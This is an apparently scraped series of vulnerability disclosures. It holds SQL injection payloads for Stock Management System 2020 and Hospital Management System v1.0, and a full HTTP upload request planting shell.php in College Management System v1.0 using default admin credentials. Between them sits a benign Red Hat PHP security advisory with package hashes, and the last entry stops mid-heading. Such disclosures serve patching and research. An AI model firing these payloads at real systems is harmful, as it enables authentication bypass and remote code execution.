Stock Management System 2020 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ## Title: Stock-Management-System-2020 SQLi## Author: nu11secur1ty## Date: 07.02.2022## Vendor: https://github.com/Dav-ee## Software: https://github.com/Dav-ee/Stock-Management-System## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Kiprono-Davies/2022/Stock-Management-System-2020## Description:The username parameter appears to be vulnerable to SQL injection attacks.The attacker kan take an access to all acounts on this system.Status: CRITICAL[+] Payloads:```mysql---Parameter: username (POST)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: username=RCIdtbFU''' AND (SELECT 9919 FROM(SELECTCOUNT(*),CONCAT(0x71787a6271,(SELECT(ELT(9919=9919,1))),0x717a626271,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND'LcYi'='LcYi&password=g5X!p2l!Q6    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: username=RCIdtbFU''' AND (SELECT 6942 FROM(SELECT(SLEEP(5)))NOpI) AND 'uUsT'='uUsT&password=g5X!p2l!Q6---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Kiprono-Davies/2022/Stock-Management-System-2020)## Proof and Exploit:[href](https://streamable.com/urkvz7)

Stock Management System 2020 SQL Injection

An update for rh-php73-php is now available for Red Hat Software Collections.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2021-21703: php: Local privilege escalation via PHP-FPM
* CVE-2021-21707: php: special character breaks path in xml parsing
* CVE-2022-31625: php: uninitialized array in pg_query_params() leading to RCE
* CVE-2022-31626: php: password of excessive length triggers buffer overflow leading to RCE


Issued:

2022-07-04

Updated:

2022-07-04

**RHSA-2022:5491 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: rh-php73-php security and bug fix update

**Type/Severity**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for rh-php73-php is now available for Red Hat Software Collections.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.  

Security Fix(es):  

*   php: password of excessive length triggers buffer overflow leading to RCE (CVE-2022-31626)
*   php: Local privilege escalation via PHP-FPM (CVE-2021-21703)
*   php: special character breaks path in xml parsing (CVE-2021-21707)
*   php: uninitialized array in pg\_query\_params() leading to RCE (CVE-2022-31625)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  

Bug Fix(es):  

*   rh-php73: rebase to 7.3.33 (BZ#2100753)

**Solution**

For details on how to apply this update, which includes the changes described in this advisory, refer to:  

https://access.redhat.com/articles/11258

After installing the updated packages, the httpd daemon must be restarted for the update to take effect.

**Affected Products**

*   Red Hat Software Collections (for RHEL Server) 1 for RHEL 7 x86\_64
*   Red Hat Software Collections (for RHEL Server for System Z) 1 for RHEL 7 s390x
*   Red Hat Software Collections (for RHEL Server for IBM Power LE) 1 for RHEL 7 ppc64le
*   Red Hat Software Collections (for RHEL Workstation) 1 for RHEL 7 x86\_64

**Fixes**

*   BZ - 2016535 - CVE-2021-21703 php: Local privilege escalation via PHP-FPM
*   BZ - 2026045 - CVE-2021-21707 php: special character breaks path in xml parsing
*   BZ - 2098521 - CVE-2022-31625 php: uninitialized array in pg\_query\_params() leading to RCE
*   BZ - 2098523 - CVE-2022-31626 php: password of excessive length triggers buffer overflow leading to RCE
*   BZ - 2100753 - rh-php73: rebase to 7.3.33 \[rhscl-3.8.z\]

**CVEs**

*   CVE-2021-21703
*   CVE-2021-21707
*   CVE-2022-31625
*   CVE-2022-31626

**Red Hat Software Collections (for RHEL Server) 1 for RHEL 7**

SRPM

rh-php73-php-7.3.33-1.el7.src.rpm

SHA-256: 89fd4cefb035f69bd8aa4a571524bf34665e7e678a1df8fb7baf29a6dbc6f03a

x86\_64

rh-php73-php-7.3.33-1.el7.x86\_64.rpm

SHA-256: 8a8b7c0a682c4e9193c8fb9d3270716cccb5bd1f110825171fb96eb6de8a5834

rh-php73-php-bcmath-7.3.33-1.el7.x86\_64.rpm

SHA-256: 8da08516693de985df7218579c2a105ae6e88456b25fd72250dbaf4207c3bbac

rh-php73-php-cli-7.3.33-1.el7.x86\_64.rpm

SHA-256: 36cccda9649be02c51fbed105616b44c27f88733dbdaa8126f8e998ee403bfff

rh-php73-php-common-7.3.33-1.el7.x86\_64.rpm

SHA-256: 3f8ead2135a682a9a4bb483b8c9da5b09ce9680eb72469f94b3ee063d9f1b14d

rh-php73-php-dba-7.3.33-1.el7.x86\_64.rpm

SHA-256: 3f787f81e73f6e40f2222c7e4aed981368bc86d10f3b4286ee266798e79d5497

rh-php73-php-dbg-7.3.33-1.el7.x86\_64.rpm

SHA-256: 5c1ee586ebe9e12ca114c6156891b9e606e048e073417ed71746bcaf78b124de

rh-php73-php-debuginfo-7.3.33-1.el7.x86\_64.rpm

SHA-256: 488e3bd4630ffae69d43d21160db84300c30307da94778f6e69b24ec19c3dff2

rh-php73-php-devel-7.3.33-1.el7.x86\_64.rpm

SHA-256: 854147c9cb3125a53fb4397712da59803d87d9c3d4dba222ca962bbd19e9a994

rh-php73-php-embedded-7.3.33-1.el7.x86\_64.rpm

SHA-256: 27e87ac90f853c044e6786c45132b113856d7d963fb782b0ab4f422a34f052ec

rh-php73-php-enchant-7.3.33-1.el7.x86\_64.rpm

SHA-256: 4035b5b0c0d36b63074ddd6a27a7c794e16a78056d934439f474caa04116f513

rh-php73-php-fpm-7.3.33-1.el7.x86\_64.rpm

SHA-256: ff1901766c3cbf4f2d1bab64e7ad1c90620abd3a1d9b7e33c1bfe525b8f12f3b

rh-php73-php-gd-7.3.33-1.el7.x86\_64.rpm

SHA-256: 907b0a5f3ab282f5dcd92a4f137f2414aa7eb2d0e82201f188c5c11de133a00c

rh-php73-php-gmp-7.3.33-1.el7.x86\_64.rpm

SHA-256: 17c797b8f17d65d5ab00c52adb9492fd434417b6911fc717c98f1a33dc2ded9d

rh-php73-php-intl-7.3.33-1.el7.x86\_64.rpm

SHA-256: d7c624fe7298ecbd304476d1bb347d428f258c23b8015279250a4c3ad6923b02

rh-php73-php-json-7.3.33-1.el7.x86\_64.rpm

SHA-256: fb4190fd16df2dd19ce7b9a9d5025dc6c9962775b11a83d6f6d72b1b77951c47

rh-php73-php-ldap-7.3.33-1.el7.x86\_64.rpm

SHA-256: 99f622c0b510f072c7e267f0ed3f57cf7ac497b8ade28967984e7054378e50bf

rh-php73-php-mbstring-7.3.33-1.el7.x86\_64.rpm

SHA-256: c6659e20604fd8bb90c8ee871d42790b5293a4ca4b40cb4386f8a6f115d9e746

rh-php73-php-mysqlnd-7.3.33-1.el7.x86\_64.rpm

SHA-256: 0ebda36a1c8a42de5878b99f3f99a55f929b34cc3ee97c683d886dd9e1bab211

rh-php73-php-odbc-7.3.33-1.el7.x86\_64.rpm

SHA-256: c3f272953ee9d174c60751ef7d9c7cd902a371da8479d1019019d2e69638667a

rh-php73-php-opcache-7.3.33-1.el7.x86\_64.rpm

SHA-256: 7c32277c8ff28483b54b29db03cc4eec8ac2899011797ca9aef4daa4ce918e7c

rh-php73-php-pdo-7.3.33-1.el7.x86\_64.rpm

SHA-256: fd17863f32e8e6e36950d4292a429a8f4f284df3ebe22604f44646b3af0dcaa9

rh-php73-php-pgsql-7.3.33-1.el7.x86\_64.rpm

SHA-256: bfa7ea76b1e2a7b6bbd982b08e2a5fdfd50c90fbbea90d14d7511be2ec86de03

rh-php73-php-process-7.3.33-1.el7.x86\_64.rpm

SHA-256: c9b8556867bf0efbdca351861dc68c70928cbe60b73a49ea582f6648e1a24025

rh-php73-php-pspell-7.3.33-1.el7.x86\_64.rpm

SHA-256: 751e99d1f747b3b284e333eff69a18246d31a82db16b4897af523f1b295e7af9

rh-php73-php-recode-7.3.33-1.el7.x86\_64.rpm

SHA-256: 8630c5d3cffa1314923802d3a65a9a3aeea3ab17d6dcc8a5075d6391ede1e124

rh-php73-php-snmp-7.3.33-1.el7.x86\_64.rpm

SHA-256: a106f1251cd881f97db481a2b528cc2f0044c7f61c652874db987cbf7538694d

rh-php73-php-soap-7.3.33-1.el7.x86\_64.rpm

SHA-256: 022bd0d398966c5e7b1f004f2455bff385befd9a224d212da4705a38f5da3980

rh-php73-php-xml-7.3.33-1.el7.x86\_64.rpm

SHA-256: d54134d3f891d97c69496f4ec8d7c39c2c8fa220003a9fadf048a86f805f862d

rh-php73-php-xmlrpc-7.3.33-1.el7.x86\_64.rpm

SHA-256: ef2139423636090bd2cb9199915f23bca35d3c6f939e7f3ae7d68a8bcc6e7186

rh-php73-php-zip-7.3.33-1.el7.x86\_64.rpm

SHA-256: 71d8dff23a949272258073d1efd903b14828c9dac9e3f3879890250ea7df1bd3

**Red Hat Software Collections (for RHEL Server for System Z) 1 for RHEL 7**

SRPM

rh-php73-php-7.3.33-1.el7.src.rpm

SHA-256: 89fd4cefb035f69bd8aa4a571524bf34665e7e678a1df8fb7baf29a6dbc6f03a

s390x

rh-php73-php-7.3.33-1.el7.s390x.rpm

SHA-256: f7932bbf53ccc730cdb0d3ad4fa3222e11fbe733c751e4d4ad0c06f9619d51d2

rh-php73-php-bcmath-7.3.33-1.el7.s390x.rpm

SHA-256: 2f16fa0ea02318df9875c9453f4c57f15ebd9a228ad0f0354a5b3207770702d7

rh-php73-php-cli-7.3.33-1.el7.s390x.rpm

SHA-256: aec3da8e6462c87d29c2744678c53ba9ce783f6513c8904227c3bcf88ca6e13f

rh-php73-php-common-7.3.33-1.el7.s390x.rpm

SHA-256: 1ddb901001d29eeccdf707c503f47ea1ad200772c9669ddcc9833c61cbe3cb9c

rh-php73-php-dba-7.3.33-1.el7.s390x.rpm

SHA-256: f7387b4e3e2c26677a9731d62915fc8a4003a10a5b68fa22d24a8293c21c8c0e

rh-php73-php-dbg-7.3.33-1.el7.s390x.rpm

SHA-256: 1e52a017a235668136cdc98792364335229f783b6f74a8196fbc5bd2614748fb

rh-php73-php-debuginfo-7.3.33-1.el7.s390x.rpm

SHA-256: fe222910d9b06e0a9212cc1965d82d7c66acc1e8d3302f3f7e341bdb18c93c33

rh-php73-php-devel-7.3.33-1.el7.s390x.rpm

SHA-256: ccf7986b559f2ec3860b800bfb3ac818974e8974d6909bd9924b427764c45133

rh-php73-php-embedded-7.3.33-1.el7.s390x.rpm

SHA-256: 4fc6647859640cfb3a4651869d4ca556dcb666ea07edbcc00b5940c4a501d6a9

rh-php73-php-enchant-7.3.33-1.el7.s390x.rpm

SHA-256: 28e7eb22fb36a72238a3988589218d61e1a0581ab2d2a8a38eca53e5bcbe1115

rh-php73-php-fpm-7.3.33-1.el7.s390x.rpm

SHA-256: 712b18dbfd2a3c3242f93dca5dead0726500de9573cdbe98df26798016c1d184

rh-php73-php-gd-7.3.33-1.el7.s390x.rpm

SHA-256: 67b879de5da62135c03187831bdcbdaaf54c83fb5b34da5b0d3e2b66e2f9ee61

rh-php73-php-gmp-7.3.33-1.el7.s390x.rpm

SHA-256: 9ce681e2c237241adbd880f6538812f42a63ad6027f31955221dca2fd0b1b2ed

rh-php73-php-intl-7.3.33-1.el7.s390x.rpm

SHA-256: 1b814efee81a807afe787cd6357293c9f949f98be43cbbb36a8102ce6cabe65d

rh-php73-php-json-7.3.33-1.el7.s390x.rpm

SHA-256: 0466fdceee4735638212ad5b802d46c0d604a47a924a789bf6923c50e44b19f9

rh-php73-php-ldap-7.3.33-1.el7.s390x.rpm

SHA-256: bd0863b4663879787eaabce42311f19110b71f0ede26ac46843b071ed3a6dd86

rh-php73-php-mbstring-7.3.33-1.el7.s390x.rpm

SHA-256: c81d2203d01f06722d44ad9baebac38c961429f85d1244eddf7a938a30336903

rh-php73-php-mysqlnd-7.3.33-1.el7.s390x.rpm

SHA-256: afe0cfb0fdffb4ac34aef5c9a6f6415b107f876caeb0361282d765c6358f72b3

rh-php73-php-odbc-7.3.33-1.el7.s390x.rpm

SHA-256: 83da7c4381f88fe251266f5a90dcec3516a0c991b1eae978b1c1991fe1203fdc

rh-php73-php-opcache-7.3.33-1.el7.s390x.rpm

SHA-256: 5b531c59c6a635b5ec2114b76da0b3fc19205f29f5f6a6abade6a4f82b5e3d39

rh-php73-php-pdo-7.3.33-1.el7.s390x.rpm

SHA-256: 754d5664b48bd6384716bb4f0e23a18302422695f8943f1f051c97e54169e2c4

rh-php73-php-pgsql-7.3.33-1.el7.s390x.rpm

SHA-256: 8d41c7af684510cbecbb65aafd434b5084701c19d3da64014ceff6dfaf00fa83

rh-php73-php-process-7.3.33-1.el7.s390x.rpm

SHA-256: 6da5a8171f4113e3e77b0093ab57de0f48c01b3bd71cf52c323d88060932c882

rh-php73-php-pspell-7.3.33-1.el7.s390x.rpm

SHA-256: 8c748a361442ca3eedf2777ed9409abe578b5859137b22ec91c9d68c5732ae0b

rh-php73-php-recode-7.3.33-1.el7.s390x.rpm

SHA-256: fc9ff8f01934c1ae15addfe440af1c0b57898523fba1e0c2f38ab46992d54984

rh-php73-php-snmp-7.3.33-1.el7.s390x.rpm

SHA-256: 44d400ca7e3ba340fec1c25ce73626217d0e93406848bb34020ce4f3e5c60ab8

rh-php73-php-soap-7.3.33-1.el7.s390x.rpm

SHA-256: 687dec23c1090656c612c6f1466c590db1658b7865d53196ce2b627afa24ca86

rh-php73-php-xml-7.3.33-1.el7.s390x.rpm

SHA-256: 64af7c18a426ea078abb19ee44f1c9b57291829866487f03d4f4a4e36d74f299

rh-php73-php-xmlrpc-7.3.33-1.el7.s390x.rpm

SHA-256: 520c082eee390b682044f89da4c0bc1e66fd027a2f98a6392a977b6a773f34fb

rh-php73-php-zip-7.3.33-1.el7.s390x.rpm

SHA-256: dd385533080ad9bbf99d104017a02a92303323763cec8ba0eed55e09127be697

**Red Hat Software Collections (for RHEL Server for IBM Power LE) 1 for RHEL 7**

SRPM

rh-php73-php-7.3.33-1.el7.src.rpm

SHA-256: 89fd4cefb035f69bd8aa4a571524bf34665e7e678a1df8fb7baf29a6dbc6f03a

ppc64le

rh-php73-php-7.3.33-1.el7.ppc64le.rpm

SHA-256: feb5c593a3c41653ffa6bb0e11a6c0a4d84330d1d277c963abebc48be1760d06

rh-php73-php-bcmath-7.3.33-1.el7.ppc64le.rpm

SHA-256: a89bb6d7d282ac5d233f89bb79cdb374f7e0fb938c6d4d37a620417e168ad209

rh-php73-php-cli-7.3.33-1.el7.ppc64le.rpm

SHA-256: 075049479dd1f399dfd09d309dc922f2e78c8dc6900577ec7189629ee81c8008

rh-php73-php-common-7.3.33-1.el7.ppc64le.rpm

SHA-256: 770889ade9d43eff4bf5b7fb38307109ef63df249bb357589728cfaf7c25d908

rh-php73-php-dba-7.3.33-1.el7.ppc64le.rpm

SHA-256: 13c92c339015a555c154b913ea6b8e3909d828416288fb501669a3c666d454cc

rh-php73-php-dbg-7.3.33-1.el7.ppc64le.rpm

SHA-256: 796208cc83dec7d62aaacf10b4d1cc12f56827fde35c6ce8113acfb99f1e51b9

rh-php73-php-debuginfo-7.3.33-1.el7.ppc64le.rpm

SHA-256: a86ab84b2b3cc558f67ec2932701f0d273a0cb36123daa237d4028cd0a02adbf

rh-php73-php-devel-7.3.33-1.el7.ppc64le.rpm

SHA-256: 42d6d22282bc7d105cba658f2b63495c8729d04b9c1c1892d569cba569cb06d2

rh-php73-php-embedded-7.3.33-1.el7.ppc64le.rpm

SHA-256: f86e0d550998d3cab7deafaad639d661317caa8fb8f0ce7e4c152d42d59e6e6e

rh-php73-php-enchant-7.3.33-1.el7.ppc64le.rpm

SHA-256: 286372a711b201117c5f30fb1d8b08325ce48fe0d9684cf7055f254002ebf56c

rh-php73-php-fpm-7.3.33-1.el7.ppc64le.rpm

SHA-256: d19906055ef0e77d26495e5af46ab6a88d81bc627d9b636afc5a1d0c631d02a0

rh-php73-php-gd-7.3.33-1.el7.ppc64le.rpm

SHA-256: 1162c17104ec9682733306e79402d498739c929b0818b8ca564f702523472b2c

rh-php73-php-gmp-7.3.33-1.el7.ppc64le.rpm

SHA-256: 340e2ac38611ecb93076a99963e79ac3606a307054c8c1ba0bea9a3206aab831

rh-php73-php-intl-7.3.33-1.el7.ppc64le.rpm

SHA-256: 50fb71d64aa703089db7b3ce9e0ee847ae7fd5e49c1609748646b60b2503fd95

rh-php73-php-json-7.3.33-1.el7.ppc64le.rpm

SHA-256: 5f405c5886525ccce176631919ba84da2f55741a180995d54647c5a9aad18eb1

rh-php73-php-ldap-7.3.33-1.el7.ppc64le.rpm

SHA-256: a5338478a398f3c045b5e591420fcc80f158cba826dbebf837bc3604abe2b5a1

rh-php73-php-mbstring-7.3.33-1.el7.ppc64le.rpm

SHA-256: d826959e94692416e31e1daa932b9235846eabb3b6ba0fe71389793248d2d2fb

rh-php73-php-mysqlnd-7.3.33-1.el7.ppc64le.rpm

SHA-256: e90c2cd10e4de97fad3e168ad39f16f98a5cfd28e298a43b7fd5d943306d067b

rh-php73-php-odbc-7.3.33-1.el7.ppc64le.rpm

SHA-256: 13cd97f9cffe359629583f1b087ddd0399cb1520e9b98268fc43996a0290c549

rh-php73-php-opcache-7.3.33-1.el7.ppc64le.rpm

SHA-256: daa948c030f860a001d1ba5cbb26ff748495429c0e99968f00a87afd363cb555

rh-php73-php-pdo-7.3.33-1.el7.ppc64le.rpm

SHA-256: 158ab73373ef09fec9a054ec75528d2b4a134545a27971de9e2c9c40b71fb735

rh-php73-php-pgsql-7.3.33-1.el7.ppc64le.rpm

SHA-256: 72de88e093b2d7d7cfdadfc93c0feed38959d1521296925114fd14a6af54e9b4

rh-php73-php-process-7.3.33-1.el7.ppc64le.rpm

SHA-256: b913995d5c59a80bf0721090959be2af08f23345febeee5690953cf82ec96255

rh-php73-php-pspell-7.3.33-1.el7.ppc64le.rpm

SHA-256: ef6388fe53834b98c6474982409ffb012a3ac5fd915a4f3f3aacd0992357c8f8

rh-php73-php-recode-7.3.33-1.el7.ppc64le.rpm

SHA-256: f559d5c29ecab444435923befc78124b2b8dd4ef7a6ac0e636860397c98d93d8

rh-php73-php-snmp-7.3.33-1.el7.ppc64le.rpm

SHA-256: f90dfd3f1a9bb213301c5b09e05a31b5579678a8d362b490ff69a8d7e47611d7

rh-php73-php-soap-7.3.33-1.el7.ppc64le.rpm

SHA-256: 8ccd16725a671a9549662cdcfec8d9f4451317f05ed39f4d2baac2ae931e9512

rh-php73-php-xml-7.3.33-1.el7.ppc64le.rpm

SHA-256: bfe9b0012a5788fb848e6d13b603642ec4eb485870862155bcf6551f370b1309

rh-php73-php-xmlrpc-7.3.33-1.el7.ppc64le.rpm

SHA-256: 66b92c438a35b3986c7e0e7ac7ed192398fe06fbe0f937129c588f235b414a67

rh-php73-php-zip-7.3.33-1.el7.ppc64le.rpm

SHA-256: fcf107ba56148f4a13045b7f6e1e7db18ecb436e8b533d1230e0e588379a6150

**Red Hat Software Collections (for RHEL Workstation) 1 for RHEL 7**

SRPM

rh-php73-php-7.3.33-1.el7.src.rpm

SHA-256: 89fd4cefb035f69bd8aa4a571524bf34665e7e678a1df8fb7baf29a6dbc6f03a

x86\_64

rh-php73-php-7.3.33-1.el7.x86\_64.rpm

SHA-256: 8a8b7c0a682c4e9193c8fb9d3270716cccb5bd1f110825171fb96eb6de8a5834

rh-php73-php-bcmath-7.3.33-1.el7.x86\_64.rpm

SHA-256: 8da08516693de985df7218579c2a105ae6e88456b25fd72250dbaf4207c3bbac

rh-php73-php-cli-7.3.33-1.el7.x86\_64.rpm

SHA-256: 36cccda9649be02c51fbed105616b44c27f88733dbdaa8126f8e998ee403bfff

rh-php73-php-common-7.3.33-1.el7.x86\_64.rpm

SHA-256: 3f8ead2135a682a9a4bb483b8c9da5b09ce9680eb72469f94b3ee063d9f1b14d

rh-php73-php-dba-7.3.33-1.el7.x86\_64.rpm

SHA-256: 3f787f81e73f6e40f2222c7e4aed981368bc86d10f3b4286ee266798e79d5497

rh-php73-php-dbg-7.3.33-1.el7.x86\_64.rpm

SHA-256: 5c1ee586ebe9e12ca114c6156891b9e606e048e073417ed71746bcaf78b124de

rh-php73-php-debuginfo-7.3.33-1.el7.x86\_64.rpm

SHA-256: 488e3bd4630ffae69d43d21160db84300c30307da94778f6e69b24ec19c3dff2

rh-php73-php-devel-7.3.33-1.el7.x86\_64.rpm

SHA-256: 854147c9cb3125a53fb4397712da59803d87d9c3d4dba222ca962bbd19e9a994

rh-php73-php-embedded-7.3.33-1.el7.x86\_64.rpm

SHA-256: 27e87ac90f853c044e6786c45132b113856d7d963fb782b0ab4f422a34f052ec

rh-php73-php-enchant-7.3.33-1.el7.x86\_64.rpm

SHA-256: 4035b5b0c0d36b63074ddd6a27a7c794e16a78056d934439f474caa04116f513

rh-php73-php-fpm-7.3.33-1.el7.x86\_64.rpm

SHA-256: ff1901766c3cbf4f2d1bab64e7ad1c90620abd3a1d9b7e33c1bfe525b8f12f3b

rh-php73-php-gd-7.3.33-1.el7.x86\_64.rpm

SHA-256: 907b0a5f3ab282f5dcd92a4f137f2414aa7eb2d0e82201f188c5c11de133a00c

rh-php73-php-gmp-7.3.33-1.el7.x86\_64.rpm

SHA-256: 17c797b8f17d65d5ab00c52adb9492fd434417b6911fc717c98f1a33dc2ded9d

rh-php73-php-intl-7.3.33-1.el7.x86\_64.rpm

SHA-256: d7c624fe7298ecbd304476d1bb347d428f258c23b8015279250a4c3ad6923b02

rh-php73-php-json-7.3.33-1.el7.x86\_64.rpm

SHA-256: fb4190fd16df2dd19ce7b9a9d5025dc6c9962775b11a83d6f6d72b1b77951c47

rh-php73-php-ldap-7.3.33-1.el7.x86\_64.rpm

SHA-256: 99f622c0b510f072c7e267f0ed3f57cf7ac497b8ade28967984e7054378e50bf

rh-php73-php-mbstring-7.3.33-1.el7.x86\_64.rpm

SHA-256: c6659e20604fd8bb90c8ee871d42790b5293a4ca4b40cb4386f8a6f115d9e746

rh-php73-php-mysqlnd-7.3.33-1.el7.x86\_64.rpm

SHA-256: 0ebda36a1c8a42de5878b99f3f99a55f929b34cc3ee97c683d886dd9e1bab211

rh-php73-php-odbc-7.3.33-1.el7.x86\_64.rpm

SHA-256: c3f272953ee9d174c60751ef7d9c7cd902a371da8479d1019019d2e69638667a

rh-php73-php-opcache-7.3.33-1.el7.x86\_64.rpm

SHA-256: 7c32277c8ff28483b54b29db03cc4eec8ac2899011797ca9aef4daa4ce918e7c

rh-php73-php-pdo-7.3.33-1.el7.x86\_64.rpm

SHA-256: fd17863f32e8e6e36950d4292a429a8f4f284df3ebe22604f44646b3af0dcaa9

rh-php73-php-pgsql-7.3.33-1.el7.x86\_64.rpm

SHA-256: bfa7ea76b1e2a7b6bbd982b08e2a5fdfd50c90fbbea90d14d7511be2ec86de03

rh-php73-php-process-7.3.33-1.el7.x86\_64.rpm

SHA-256: c9b8556867bf0efbdca351861dc68c70928cbe60b73a49ea582f6648e1a24025

rh-php73-php-pspell-7.3.33-1.el7.x86\_64.rpm

SHA-256: 751e99d1f747b3b284e333eff69a18246d31a82db16b4897af523f1b295e7af9

rh-php73-php-recode-7.3.33-1.el7.x86\_64.rpm

SHA-256: 8630c5d3cffa1314923802d3a65a9a3aeea3ab17d6dcc8a5075d6391ede1e124

rh-php73-php-snmp-7.3.33-1.el7.x86\_64.rpm

SHA-256: a106f1251cd881f97db481a2b528cc2f0044c7f61c652874db987cbf7538694d

rh-php73-php-soap-7.3.33-1.el7.x86\_64.rpm

SHA-256: 022bd0d398966c5e7b1f004f2455bff385befd9a224d212da4705a38f5da3980

rh-php73-php-xml-7.3.33-1.el7.x86\_64.rpm

SHA-256: d54134d3f891d97c69496f4ec8d7c39c2c8fa220003a9fadf048a86f805f862d

rh-php73-php-xmlrpc-7.3.33-1.el7.x86\_64.rpm

SHA-256: ef2139423636090bd2cb9199915f23bca35d3c6f939e7f3ae7d68a8bcc6e7186

rh-php73-php-zip-7.3.33-1.el7.x86\_64.rpm

SHA-256: 71d8dff23a949272258073d1efd903b14828c9dac9e3f3879890250ea7df1bd3

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2022:5491: Red Hat Security Advisory: rh-php73-php security and bug fix update

College Management System v1.0 was discovered to contain a remote code execution (RCE) vulnerability via /College/admin/teacher.php. This vulnerability is exploited via a crafted PHP file.

Permalink

Cannot retrieve contributors at this time

**College Management System v1.0 by itsourcecode.com has arbitrary code execution (RCE)**

Login account: admin@gmail.com/admin123\* (Super Admin account)

vendor: https://itsourcecode.com/free-projects/php-project/college-management-system-project-in-php-and-mysql/

Vulnerability url: /College/admin/teacher.php

Vulnerability file: /College/admin/teacher.php

Payload:

POST /College/admin/teacher.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/College/admin/Teacher.php
Cookie: PHPSESSID=7g6mvmuq5m1o1cvqrhprll4jr1; ci\_session=9cjop1qgnjcd780kijmjrva559enogjl
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------2754910320402
Content-Length: 3466
\-----------------------------2754910320402
Content-Disposition: form-data; name="first\_name"
1
\-----------------------------2754910320402
Content-Disposition: form-data; name="middle\_name"
1
\-----------------------------2754910320402
Content-Disposition: form-data; name="last\_name"
1
\-----------------------------2754910320402
Content-Disposition: form-data; name="email"
111@qq.com
\-----------------------------2754910320402
Content-Disposition: form-data; name="phone\_no"
1
\-----------------------------2754910320402
Content-Disposition: form-data; name="profile\_image"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------2754910320402
Content-Disposition: form-data; name="teacher\_status"
Permanent
\-----------------------------2754910320402
Content-Disposition: form-data; name="application\_status"
Yes
\-----------------------------2754910320402
Content-Disposition: form-data; name="cnic"
1
\-----------------------------2754910320402
Content-Disposition: form-data; name="dob"
1
\-----------------------------2754910320402
Content-Disposition: form-data; name="other\_phone"
1
\-----------------------------2754910320402
Content-Disposition: form-data; name="gender"
Male
\-----------------------------2754910320402
Content-Disposition: form-data; name="permanent\_address"
1
\-----------------------------2754910320402
Content-Disposition: form-data; name="current\_address"
1
\-----------------------------2754910320402
Content-Disposition: form-data; name="place\_of\_birth"
1111
\-----------------------------2754910320402
Content-Disposition: form-data; name="matric\_complition\_date"
1
\-----------------------------2754910320402
Content-Disposition: form-data; name="matric\_awarded\_date"
1
\-----------------------------2754910320402
Content-Disposition: form-data; name="matric\_certificate"; filename=""
Content-Type: application/octet-stream
\-----------------------------2754910320402
Content-Disposition: form-data; name="fa\_complition\_date"
1
\-----------------------------2754910320402
Content-Disposition: form-data; name="fa\_awarded\_date"
1
\-----------------------------2754910320402
Content-Disposition: form-data; name="fa\_certificate"; filename=""
Content-Type: application/octet-stream
\-----------------------------2754910320402
Content-Disposition: form-data; name="ba\_complition\_date"
1
\-----------------------------2754910320402
Content-Disposition: form-data; name="ba\_awarded\_date"
1
\-----------------------------2754910320402
Content-Disposition: form-data; name="ba\_certificate"; filename=""
Content-Type: application/octet-stream
\-----------------------------2754910320402
Content-Disposition: form-data; name="ma\_complition\_date"
1
\-----------------------------2754910320402
Content-Disposition: form-data; name="ma\_awarded\_date"
1
\-----------------------------2754910320402
Content-Disposition: form-data; name="ma\_certificate"; filename=""
Content-Type: application/octet-stream
\-----------------------------2754910320402
Content-Disposition: form-data; name="password"
teacher123\*
\-----------------------------2754910320402
Content-Disposition: form-data; name="role"
Teacher
\-----------------------------2754910320402
Content-Disposition: form-data; name="btn\_save"
Save Data
\-----------------------------2754910320402--

The files will be uploaded to this directory \\Admin\\images

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-32420: bug_report/RCE-1.md at main · rainb0w-q/bug_report

Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter at orders.php.

The editid parameter in the orders.php page appears to be vulnerable to SQL injection attacks.

    Parameter: editid (GET)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: editid=1' AND (SELECT 7774 FROM (SELECT(SLEEP(5)))puHE) AND 'zVYe'='zVYe
    

    GET /hms/orders.php?editid=1 HTTP/1.1
    Host: 192.168.74.136
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: PHPSESSID=sbgmgg8q26ri1tmnqfv7poto25
    Upgrade-Insecure-Requests: 1

CVE-2022-32095: GitHub - Danie1233/Hospital-Management-System-v1.0-SQLi-4

Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the loginid parameter at doctorlogin.php.

****Hospital-Management-System v1.0-SQLi-3******Vendor**

**Description:**

